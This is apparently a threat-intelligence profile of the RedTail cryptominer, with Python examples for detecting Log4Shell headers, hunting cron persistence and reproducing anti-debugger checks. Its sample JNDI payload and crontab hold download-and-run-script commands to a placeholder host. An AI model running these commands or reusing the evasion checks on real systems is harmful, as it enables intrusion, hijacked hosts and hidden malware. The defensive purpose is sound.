RedTail

| Attribute | Value |
| --- | --- |
| Type of Malware | Cryptominer |
| Country of Origin | Unknown |
| Date of initial activity | 2024 |
| Associated Groups | Unknown |
| Targeted Countries | Unknown |
| Motivation | Financial gain: infected systems are used to mine cryptocurrency |
| Attack vectors | Spreads through at least six different web exploits, targeting Internet of Things (IoT) devices (such as TP-Link routers), web applications (including the China-origin content management system ThinkPHP), SSL-VPNs, and security appliances such as Ivanti Connect Secure and Palo Alto Networks GlobalProtect |
| Targeted systems | Linux |
Overview
RedTail is primarily a cryptocurrency miner: it embeds XMRig, unpacks it and runs it in memory, and mines Monero (and a few other cryptocurrencies).
Security researcher Patryk Machowiak first documented RedTail in January 2024 in connection with a campaign exploiting the Log4Shell vulnerability (CVE-2021-44228) to deploy the malware on Unix-based systems.
Overall the malware is not especially complex, but moving almost all of its operations into memory makes a complete analysis of its behaviour significantly harder. Another notable trait is its use of ssh-agent sockets to encrypt the network traffic between the malware and the attackers' servers.
The latest version of the miner, detected in April 2024, includes significant updates, such as an encrypted mining configuration that is used to launch the embedded XMRig miner. Another notable change is the absence of a cryptocurrency wallet address, suggesting that the operators have switched to a private mining pool or a pool proxy to collect their proceeds.
Akamai described RedTail as showing a level of polish not commonly observed among cryptocurrency miner families in the wild. It is currently unclear who is behind the malware, although the use of private crypto-mining pools mirrors a tactic of the North Korea-linked Lazarus Group, which has a history of orchestrating wide-ranging, financially motivated cyber attacks, the company noted.
“The investments required to run a private crypto-mining operation are significant, including staffing, infrastructure, and obfuscation,” the researchers concluded. “This sophistication may be indicative of a nation-state-sponsored attack group.”
Targets
Vulnerable Internet of Things (IoT) devices (such as TP-Link routers), web applications (including the China-origin content management system ThinkPHP), SSL-VPNs, and security devices like Ivanti Connect Secure and Palo Alto GlobalProtect.
How they operate
Stage 1: Initial Attack
The attack began with a malicious payload embedded in the HTTP headers of a web request. Headers are a standard part of HTTP and are routinely logged by the server or the web application; the attackers exploited Log4Shell (CVE-2021-44228) so that the application's logging library would evaluate the payload and execute their code.
In this instance the payload was hidden in the User-Agent header and base64-encoded. Decoded, it instructed the target to create a temporary directory, download a script from a remote server into it, and execute that script, which in turn downloaded and installed the malware.
The attackers' sequence was:
- Craft a concealed command and send it to the target server.
- Create a hidden folder on the victim's system and download a file into it.
- Execute a script that installs the downloaded software.
Because the exploit rides on a header value that the application logs, rather than on anything a user interacts with, the intrusion is quiet: a single logged request starts the chain that ends in the miner being installed and the integrity of the system being lost.
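The stage 1 request above is easy to hunt for in request logs once you account for the lookup obfuscation attackers use. The following is an added example written for this page (not RedTail's code, and not a vendor detection rule): it normalises nested Log4j lookups such as `${${lower:j}ndi:...}`, flags any header carrying a JNDI lookup, and decodes the command when the JNDI URL uses the common exploitation-kit layout ending in `/Base64/<encoded command>`. That layout, the `203.0.113.10` address, and the dropper path in the sample requests are assumptions; the page only says the User-Agent payload was base64-encoded.

```python
"""Detect Log4Shell-style JNDI lookups in HTTP request headers and recover the
command hidden in them.

Added example for this page; it is not RedTail's code or a vendor rule. The
decoder assumes the exploitation-kit layout in which the JNDI URL ends in
/Base64/<base64 shell command>; that layout is an assumption.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Nested-lookup obfuscations seen in the wild: ${lower:j}, ${upper:N}, and the
# default-value form ${anything:-j}. Each collapses to a single literal.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([^}]*)\}", re.IGNORECASE)
_B64_SEGMENT = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def normalize_lookups(value: str) -> str:
    """Collapse nested Log4j lookups until the string stops changing, so that
    ${${lower:j}${::-n}di:...} becomes ${jndi:...}."""
    prev = None
    while prev != value:
        prev = value
        value = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            value,
        )
        value = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), value)
    return value


def decode_embedded_command(jndi_url: str) -> Optional[str]:
    """Return the shell command carried in a /Base64/<...> segment, if any."""
    m = _B64_SEGMENT.search(jndi_url)
    if not m:
        return None
    raw = m.group(1)
    raw += "=" * (-len(raw) % 4)          # tolerate stripped padding
    try:
        return base64.b64decode(raw).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


@dataclass
class Finding:
    header: str             # header that carried the lookup
    jndi_url: str           # target the vulnerable logger would resolve
    command: Optional[str]  # decoded payload, when the URL embeds one


def scan_headers(headers: Dict[str, str]) -> List[Finding]:
    """Flag every header value containing a (possibly obfuscated) JNDI lookup."""
    findings: List[Finding] = []
    for name, value in headers.items():
        for m in _JNDI.finditer(normalize_lookups(value)):
            url = m.group(1)
            findings.append(Finding(name, url, decode_embedded_command(url)))
    return findings


# Constructed sample requests (not captured traffic); 203.0.113.10 is a
# documentation address and the dropper directory is invented for the example.
STAGE1_COMMAND = ("mkdir -p /tmp/.cache && cd /tmp/.cache && "
                  "curl -s http://203.0.113.10/setup.sh | sh")
_STAGE1_B64 = base64.b64encode(STAGE1_COMMAND.encode()).decode()

SAMPLE_REQUESTS = [
    {"Host": "app.example.com", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"Host": "app.example.com",
     "User-Agent": "${jndi:ldap://203.0.113.10:1389/Basic/Command/Base64/"
                   + _STAGE1_B64 + "}"},
    {"Host": "app.example.com",
     "X-Api-Version": "${${lower:j}${::-n}di:ldap://203.0.113.10:1389/o}"},
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        for f in scan_headers(req):
            print(f"request {i}: {f.header} -> {f.jndi_url}")
            if f.command:
                print(f"  decoded command: {f.command}")
```

Scan every header, not just User-Agent: the third sample request shows the same lookup in a custom header, and any value the application logs is a viable carrier.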
Stage 2: RedTail Malware Deployment
RedTail itself is launched by the stage 1 script. Analysis shows that execution then moves into system memory; this was confirmed by static analysis of the unpacked sample.
The malware's main activity is as follows:
1. Gather system information.
2. Drop an ssh-agent socket for encrypted communication with the attackers' server.
3. Establish persistence by adding a cron job to the user's crontab that fires when the system reboots.
4. Connect through the ssh-agent socket and fetch the configuration from the attackers' server.
5. Start mining Monero.
RedTail Malware Threat Analysis Report
Analysis of the runtime memory showed that RedTail uses XMRig for Monero mining. The malware did not appear to have any defence or kill-switch mechanism for detecting a malware-analysis sandbox.
Its behaviour varied with the privilege level it ran at. When first run as an unprivileged user, the malware deployed the miner and attempted a dictionary attack against the root account, a local privilege-escalation attempt which, if it goes through su or sudo, leaves a burst of failed authentication attempts in the host's auth logs.
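The cron persistence in step 3 is the one artefact of this stage that survives a reboot, so it is the first place to look on a suspected host. The following is an added example for this page (not RedTail's code or an official detection): it parses per-user crontabs, flags every `@reboot` entry as reboot persistence, and adds reasons when a command runs from a world-writable temp directory, references a hidden dot-path, or pipes a download straight into a shell. The crontab contents are constructed, and the `/tmp/.cache/run` path and `203.0.113.10` address are invented for the example, not recovered from the sample.

```python
"""Hunt user crontabs for reboot-triggered persistence of the kind described above.

Added example for this page, not RedTail's code or an official detection.
The crontab contents at the bottom are constructed for the example.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List

SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
_HIDDEN_PATH = re.compile(r"(?:^|/)\.[^/\s]+")           # dot-prefixed path component
_DOWNLOAD_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b")
_REBOOT = re.compile(r"^@reboot\s+(.+)$")
_FIVE_FIELD = re.compile(r"^(?:\S+\s+){5}(.+)$")        # min hour dom mon dow cmd


@dataclass
class CronFinding:
    user: str
    line: str
    reasons: List[str]


def assess_command(cmd: str) -> List[str]:
    """Reasons a cron command looks like miner persistence rather than admin work."""
    reasons = []
    if any(d in cmd for d in SUSPICIOUS_DIRS):
        reasons.append("runs from a world-writable temp directory")
    if _HIDDEN_PATH.search(cmd):
        reasons.append("references a hidden (dot) path")
    if _DOWNLOAD_TO_SHELL.search(cmd):
        reasons.append("downloads and pipes straight into a shell")
    return reasons


def scan_crontab(user: str, text: str) -> List[CronFinding]:
    """Flag @reboot entries (persistence across restarts) and any scheduled entry
    whose command looks suspicious; comments and VAR=value lines are ignored."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _REBOOT.match(line)
        if m:
            reasons = ["@reboot persistence"] + assess_command(m.group(1))
        else:
            m = _FIVE_FIELD.match(line)
            if not m:
                continue
            reasons = assess_command(m.group(1))
        if reasons:
            findings.append(CronFinding(user, line, reasons))
    return findings


def scan_all(crontabs: Dict[str, str]) -> List[CronFinding]:
    findings = []
    for user, text in crontabs.items():
        findings.extend(scan_crontab(user, text))
    return findings


def read_spool(spool: str = "/var/spool/cron/crontabs") -> Dict[str, str]:
    """Load every per-user crontab from the spool (Debian layout; needs root)."""
    out = {}
    for user in os.listdir(spool):
        with open(os.path.join(spool, user)) as f:
            out[user] = f.read()
    return out


# Constructed crontabs for the example (not from an infected host).
SAMPLE_CRONTABS = {
    "www-data": "@reboot /tmp/.cache/run >/dev/null 2>&1\n",
    "deploy": "MAILTO=ops@example.com\n0 3 * * * /usr/local/bin/backup.sh\n",
    "root": "*/5 * * * * curl -s http://203.0.113.10/a.sh | sh\n",
}

if __name__ == "__main__":
    for f in scan_all(SAMPLE_CRONTABS):
        print(f"{f.user}: {f.line}  [{'; '.join(f.reasons)}]")
```

On a live host replace `SAMPLE_CRONTABS` with `read_spool()` (or `/var/spool/cron` on Red Hat-style layouts) and also check `/etc/cron.d` and the system crontab, since a sample running as root is not limited to the per-user spool.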
Stage 3: Additional Exploitation Activities
During analysis the malware was also observed attempting to exploit a further vulnerability. These attempts were specific to the environment it was running in and drew on the system information enumerated in the earlier stage.
Latest RedTail Miner Updates
The most recent version of the miner, detected in April 2024, introduces significant changes, including an encrypted mining configuration that is used to launch the embedded XMRig miner.
A notable change is the absence of a cryptocurrency wallet address in the configuration, suggesting that the operators have moved to a private mining pool or a pool proxy to maximise their returns.
According to the researchers, the configuration shows a concerted effort to optimise the mining operation and reflects a deep understanding of crypto-mining techniques.
Unlike the earlier RedTail variant reported in early 2024, this one uses more advanced evasion and persistence techniques: it forks itself multiple times to hinder analysis, debugs its own child processes so that no external debugger can attach to them, and kills any instance of the GNU Debugger (gdb) it finds.
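The two self-checks that behaviour implies are worth having in front of you before attaching a debugger. The following is an added example for this page, not RedTail's code: the page says the sample debugs its own forked processes and kills any gdb it finds, and the `TracerPid` check and the `/proc/<pid>/comm` scan below are the assumed, standard Linux ways of implementing that, not details recovered from the sample. The debugger name list is likewise an assumption.

```python
"""Anti-analysis self-checks of the kind described above, written out so an
analyst knows what to neutralise before attaching a debugger.

Added example for this page; it is not RedTail's code. The TracerPid check
and the /proc comm scan are the assumed mechanisms, not recovered details.
"""
import os
from typing import Iterable, Iterator, List, Tuple

# Process names a miner of this kind would hunt for (assumed list).
DEBUGGER_NAMES = frozenset({"gdb", "gdb-multiarch", "strace", "ltrace"})


def parse_tracer_pid(status_text: str) -> int:
    """Return the TracerPid field of a /proc/<pid>/status body (0 = not traced)."""
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1].strip())
    return 0


def being_traced() -> bool:
    """True when a ptrace-based debugger is attached to the current process.
    A process that ptraces its own children makes TracerPid non-zero for them,
    which is exactly what blocks a second debugger from attaching."""
    with open("/proc/self/status") as f:
        return parse_tracer_pid(f.read()) != 0


def iter_proc_comm(proc_root: str = "/proc") -> Iterator[Tuple[int, str]]:
    """Yield (pid, comm) for every process visible under proc_root."""
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "comm")) as f:
                yield int(entry), f.read().strip()
        except OSError:        # process exited, or not readable
            continue


def find_debuggers(procs: Iterable[Tuple[int, str]]) -> List[int]:
    """PIDs whose comm matches a known debugger; a kill loop would target these."""
    return sorted(pid for pid, comm in procs if comm in DEBUGGER_NAMES)


if __name__ == "__main__":
    print("traced:", being_traced())
    print("debuggers visible:", find_debuggers(iter_proc_comm()))
```

The counter-measures follow from the code: `comm` is derived from the executable's file name, so a renamed copy of gdb is invisible to the scan, while the `TracerPid` check is only beaten by not being ptraced at all (a hypervisor- or emulator-based tracer) or by patching the check out of the binary.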
Akamai characterizes RedTail as exhibiting a high level of sophistication, a trait uncommon among cryptocurrency miner malware families encountered in the wild.
Significant Malware Campaigns
- Threat actors behind the RedTail cryptomining malware, initially reported in early 2024, have incorporated the recent Palo Alto PAN-OS CVE-2024-3400 vulnerability into their toolkit. (May 2024)